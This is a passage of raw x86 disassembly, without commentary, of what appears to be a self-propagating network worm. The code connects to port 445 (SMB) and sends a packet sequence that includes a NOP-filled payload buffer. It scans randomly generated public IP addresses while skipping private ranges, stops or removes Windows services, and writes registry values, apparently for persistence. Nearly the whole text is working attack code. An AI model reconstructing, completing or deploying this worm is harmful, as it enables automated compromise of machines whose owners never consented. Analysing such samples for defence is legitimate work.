var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_4406AD
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, loc_4049EE+2
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_440625
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDC7
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_4405E9
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_4407C5
lea eax, [ebp+var_6900]
push eax
push offset sub_404D5A
lea eax, [ebp+var_7C]
push eax
call sub_440951
add esp, 0Ch
xor ebx, ebx
loc_43F802: ; CODE XREF: sub_43F771+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43F802
push 60h
push offset sub_404525
lea eax, [ebp+var_303C]
push eax
call sub_440915
lea eax, [ebp+var_7C]
push eax
call sub_4407D1
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_440915
lea eax, [ebp+var_7C]
push eax
call sub_4407D1
push 9
push 40457Ch
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_440915
lea eax, [ebp+var_7C]
push eax
call sub_4407D1
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_440915
lea eax, [ebp+var_7C]
push eax
call sub_4407D1
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_440915
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_440921
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_4407AD
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_4405D1
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_4405AD
cmp eax, 0FFFFFFFFh
jnz short loc_43F944
mov [ebp+var_3054], 2
jmp loc_43FDBF
; ---------------------------------------------------------------------------
loc_43F944: ; CODE XREF: sub_43F771+1C2�j
push 64h
call sub_4407B9
push 0
push 89h
push 404313h
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43FA1E
cmp eax, 46h
jge short loc_43FA23
loc_43FA1E: ; CODE XREF: sub_43F771+2A6�j
jmp loc_43FDB5
; ---------------------------------------------------------------------------
loc_43FA23: ; CODE XREF: sub_43F771+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43FB37
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_440921
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_440915
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_440915
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_440915
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_440915
push [ebp+var_3058]
call sub_4407D1
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_440915
add esp, 48h
xor ebx, ebx
loc_43FADF: ; CODE XREF: sub_43F771+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43FADF
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_440921
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_440921
add esp, 18h
jmp short loc_43FB99
; ---------------------------------------------------------------------------
loc_43FB37: ; CODE XREF: sub_43F771+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_440921
push [ebp+var_3058]
call sub_4407D1
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_440915
lea eax, [ebp+var_89E0]
push eax
call sub_4407D1
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_440915
add esp, 24h
mov eax, dword ptr ds:loc_404933+5
mov [ebp+var_6136], eax
loc_43FB99: ; CODE XREF: sub_43F771+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
push 0
push 68h
push 404586h
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
push 0
push 0A0h
push 4045EFh
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
cmp [ebp+var_3050], 0
jz loc_43FD41
push 68h
push offset sub_40479E
lea eax, [ebp+var_89D8]
push eax
call sub_440915
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_440915
push 70h
push 404807h
lea eax, [ebp+var_6112]
push eax
call sub_440915
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_440915
push 84h
push offset sub_404878
lea eax, [ebp+var_55DE]
push eax
call sub_440915
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_4407B9
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_440601
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDB5
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short loc_43FDA7
jmp short loc_43FDA7
; ---------------------------------------------------------------------------
loc_43FD41: ; CODE XREF: sub_43F771+4FA�j
push 7Ch
push offset sub_404690
lea eax, [ebp+var_4039]
push eax
call sub_440915
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_440915
push 90h
push offset sub_40470D
lea eax, [ebp+var_37ED]
push eax
call sub_440915
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_44060D
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43FDA7: ; CODE XREF: sub_43F771+5CC�j
; sub_43F771+5CE�j
push 64h
call sub_4407B9
and [ebp+var_3054], 0
loc_43FDB5: ; CODE XREF: sub_43F771+216�j
; sub_43F771+258�j ...
push 2
push [ebp+var_54]
call sub_440619
loc_43FDBF: ; CODE XREF: sub_43F771+1CE�j
push [ebp+var_54]
call sub_4405A1
loc_43FDC7: ; CODE XREF: sub_43F771+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43F771 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FDD2 proc near ; CODE XREF: .data:loc_43FE46�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_4405C5
cmp eax, 0FFFFFFFFh
jnz short loc_43FDEE
xor eax, eax
jmp short loc_43FE08
; ---------------------------------------------------------------------------
loc_43FDEE: ; CODE XREF: sub_43FDD2+16�j
lea eax, [ebp+var_32]
push eax
call sub_4405B9
mov edi, eax
or edi, edi
jnz short loc_43FE01
xor eax, eax
jmp short loc_43FE08
; ---------------------------------------------------------------------------
loc_43FE01: ; CODE XREF: sub_43FDD2+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43FE08: ; CODE XREF: sub_43FDD2+1A�j
; sub_43FDD2+2D�j
pop edi
pop esi
leave
retn
sub_43FDD2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_440741
push eax
call sub_44095D
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_44077D
mov ebx, eax
push esi
push offset sub_4040BF
push ebx
call sub_440915
add esp, 10h
loc_43FE46: ; CODE XREF: .data:0043FE60�j
; .data:0043FE9A�j ...
call sub_43FDD2
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43FE62
push 384h
call sub_4408FD
pop ecx
jmp short loc_43FE46
; ---------------------------------------------------------------------------
loc_43FE62: ; CODE XREF: .data:0043FE53�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43FE9C
push 384h
call sub_4408FD
pop ecx
jmp short loc_43FE46
; ---------------------------------------------------------------------------
loc_43FE9C: ; CODE XREF: .data:0043FE8D�j
lea eax, [ebp-130h]
push eax
call sub_43F670
push 0
call sub_4408FD
add esp, 8
call sub_440939
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_440939
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_440939
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_440939
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43FF39
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_43FF39
mov al, [ebp-135h]
mov [ebp-131h], al
loc_43FF39: ; CODE XREF: .data:0043FF15�j
; .data:0043FF2B�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43FF6E
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push offset sub_404D49
lea eax, [ebp-130h]
push eax
call sub_440951
add esp, 14h
loc_43FF6E: ; CODE XREF: .data:0043FF40�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43FFC8
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43FFC8
cmp al, 21h
jnb short loc_43FFC8
call sub_440939
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43FFAE
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43FFAE: ; CODE XREF: .data:0043FFA7�j
mov edi, edx
add edi, 10h
push edi
push 404D3Ch
lea edi, [ebp-130h]
push edi
call sub_440951
add esp, 14h
loc_43FFC8: ; CODE XREF: .data:0043FF7A�j
; .data:0043FF84�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_440008
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_440008
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push 404D2Eh
lea eax, [ebp-130h]
push eax
call sub_440951
add esp, 10h
loc_440008: ; CODE XREF: .data:0043FFD4�j
; .data:0043FFE2�j
lea eax, [ebp-130h]
push eax
call sub_4405DD
cmp [ebp-10Ch], eax
jz loc_43FE46
push dword ptr [ebp-10Ch]
call sub_4405E9
movzx edi, word ptr ds:loc_404094
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_440951
add esp, 10h
loc_440048: ; CODE XREF: .data:00440071�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_440051: ; CODE XREF: .data:00440056�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440051
cmp eax, 19h
jz short loc_440073
push 404D25h
lea eax, [ebp-0FFh]
push eax
call sub_440969
add esp, 8
jmp short loc_440048
; ---------------------------------------------------------------------------
loc_440073: ; CODE XREF: .data:0044005B�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_44007C: ; CODE XREF: .data:00440081�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44007C
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_440915
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_4405DD
push esi
push ebx
push eax
call sub_43F771
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_4408FD
add esp, 4
jmp loc_43FE46
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4400CC proc near ; CODE XREF: .data:0044010E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_44074D
cmp eax, 80000000h
jb short loc_4400E3
mov eax, 3Ch
jmp short locret_440104
; ---------------------------------------------------------------------------
loc_4400E3: ; CODE XREF: sub_4400CC+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_440631
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_4400FF
mov eax, 12Ch
jmp short locret_440104
; ---------------------------------------------------------------------------
loc_4400FF: ; CODE XREF: sub_4400CC+2A�j
mov eax, 64h
locret_440104: ; CODE XREF: sub_4400CC+15�j
; sub_4400CC+31�j
leave
retn
sub_4400CC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_4400CC
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push offset sub_401565
push 0
push 0
call sub_4407DD
push eax
call sub_440735
xor esi, esi
jmp short loc_440167
; ---------------------------------------------------------------------------
loc_440135: ; CODE XREF: .data:00440169�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_4407DD
push eax
call sub_440735
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_4408FD
pop ecx
inc esi
loc_440167: ; CODE XREF: .data:00440133�j
cmp esi, ebx
jb short loc_440135
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440172 proc near ; CODE XREF: sub_440441+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, loc_404A2F+9
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_440195: ; CODE XREF: sub_440172+211�j
push 0F003Fh
push 0
push 0
call sub_440885
mov [ebp+var_28], eax
or eax, eax
jz loc_44037C
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_440891
mov ebx, eax
or eax, eax
jz loc_440374
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_44086D
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_4401ED: ; CODE XREF: sub_440172+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_44086D
or eax, eax
jz short loc_440203
cmp [ebp+var_1C], 1
jnz short loc_440205
loc_440203: ; CODE XREF: sub_440172+89�j
jmp short loc_440218
; ---------------------------------------------------------------------------
loc_440205: ; CODE XREF: sub_440172+8F�j
push 3E8h
call sub_4407B9
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_4401ED
loc_440218: ; CODE XREF: sub_440172:loc_440203�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_440236
push ebx
call sub_440879
loc_440236: ; CODE XREF: sub_440172+BC�j
push ebx
call sub_440861
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_440374
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_4402FC
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_44063D
or eax, eax
jz short loc_4402FC
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_440295: ; CODE XREF: sub_440172+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440295
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_4402C9
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_4402C9
push offset sub_404BA0
lea eax, [ebp+var_36C]
push eax
call sub_440969
add esp, 8
loc_4402C9: ; CODE XREF: sub_440172+131�j
; sub_440172+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_440969
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_4407E9
loc_4402FC: ; CODE XREF: sub_440172+FE�j
; sub_440172+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_440374
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_4408C1
or eax, eax
jnz short loc_440374
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_44089D
push [ebp+var_4]
call sub_4408B5
loc_440374: ; CODE XREF: sub_440172+62�j
; sub_440172+E0�j ...
push [ebp+var_28]
call sub_440861
loc_44037C: ; CODE XREF: sub_440172+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_440195
pop edi
pop esi
pop ebx
leave
retn 4
sub_440172 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_44041E
jg short loc_4403AB
cmp eax, 2
jz short loc_440415
jmp loc_44042B
; ---------------------------------------------------------------------------
loc_4403AB: ; CODE XREF: .data:0044039F�j
cmp eax, 113h
jnz short loc_44042B
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_43F3B0
mov eax, dword ptr ds:loc_404094+4
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_43F345
add esp, 30h
push 0
push 404098h
call sub_440765
jmp short loc_44043C
; ---------------------------------------------------------------------------
loc_440415: ; CODE XREF: .data:004403A4�j
push 0
call sub_440831
jmp short loc_44043C
; ---------------------------------------------------------------------------
loc_44041E: ; CODE XREF: .data:0044039D�j
push dword ptr ds:loc_402FFE+2
call sub_440849
jmp short loc_44043C
; ---------------------------------------------------------------------------
loc_44042B: ; CODE XREF: .data:004403A6�j
; .data:004403B0�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_440855
loc_44043C: ; CODE XREF: .data:00440413�j
; .data:0044041C�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440441 proc near ; CODE XREF: sub_440649+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push 403010h
call sub_4406CD
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_440951
and [ebp+var_44], 0
lea eax, loc_4023A3+4
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_440801
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push 404D25h
lea eax, [ebp+var_143]
push eax
push 0
call sub_44083D
mov dword ptr ds:loc_402FFE+2, eax
call sub_440711
push eax
call sub_43F320
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_44057D
push 0
call sub_440172
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push offset sub_40211D
push 0
push 0
call sub_4407DD
push eax
call sub_440735
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_43F345
add esp, 24h
push 0
push 2710h
push 1
push dword ptr ds:loc_402FFE+2
call sub_4407F5
jmp short loc_440562
; ---------------------------------------------------------------------------
loc_440550: ; CODE XREF: sub_440441+132�j
lea eax, [ebp+var_1C]
push eax
call sub_440819
lea eax, [ebp+var_1C]
push eax
call sub_440825
loc_440562: ; CODE XREF: sub_440441+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_44080D
or eax, eax
jnz short loc_440550
pop edi
leave
retn 10h
sub_440441 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44057D proc near ; CODE XREF: sub_440441+A5�p
jmp dword ptr ds:loc_40524C
sub_44057D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440589 proc near ; CODE XREF: .data:0043F647�p
jmp dword ptr ds:loc_405250
sub_440589 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440595 proc near ; CODE XREF: .data:0043F614�p
jmp dword ptr ds:loc_405251+3
sub_440595 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405A1 proc near ; CODE XREF: .data:0043F542�p
; sub_43F771+651�p
jmp dword ptr ds:loc_405256+2
sub_4405A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405AD proc near ; CODE XREF: sub_43F771+1BA�p
jmp dword ptr ds:loc_40525B+1
sub_4405AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405B9 proc near ; CODE XREF: sub_43FDD2+20�p
jmp dword ptr ds:loc_405260
sub_4405B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405C5 proc near ; CODE XREF: sub_43FDD2+E�p
jmp dword ptr ds:loc_405262+2
sub_4405C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405D1 proc near ; CODE XREF: .data:0043F602�p
; sub_43F771+197�p
jmp dword ptr ds:loc_405267+1
sub_4405D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405DD proc near ; CODE XREF: .data:0044000F�p
; .data:004400A0�p
jmp dword ptr ds:loc_40526C
sub_4405DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405E9 proc near ; CODE XREF: sub_43F771+63�p
; .data:00440026�p
jmp dword ptr ds:loc_40526C+4
sub_4405E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405F5 proc near ; CODE XREF: .data:0043F632�p
jmp dword ptr ds:loc_405271+3
sub_4405F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440601 proc near ; CODE XREF: .data:0043F422�p
; sub_43F771+20B�p ...
jmp dword ptr ds:loc_405278
sub_440601 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44060D proc near ; CODE XREF: .data:0043F474�p
; .data:0043F4B0�p ...
jmp dword ptr ds:loc_40527C
sub_44060D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440619 proc near ; CODE XREF: .data:0043F53A�p
; sub_43F771+649�p
jmp dword ptr ds:loc_405280
sub_440619 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440625 proc near ; CODE XREF: .data:0043F5CB�p
; sub_43F771+48�p
jmp dword ptr ds:loc_405284
sub_440625 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440631 proc near ; CODE XREF: sub_4400CC+1D�p
jmp dword ptr ds:loc_405290
sub_440631 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44063D proc near ; CODE XREF: sub_440172+111�p
jmp dword ptr ds:loc_40529A+2
sub_44063D endp
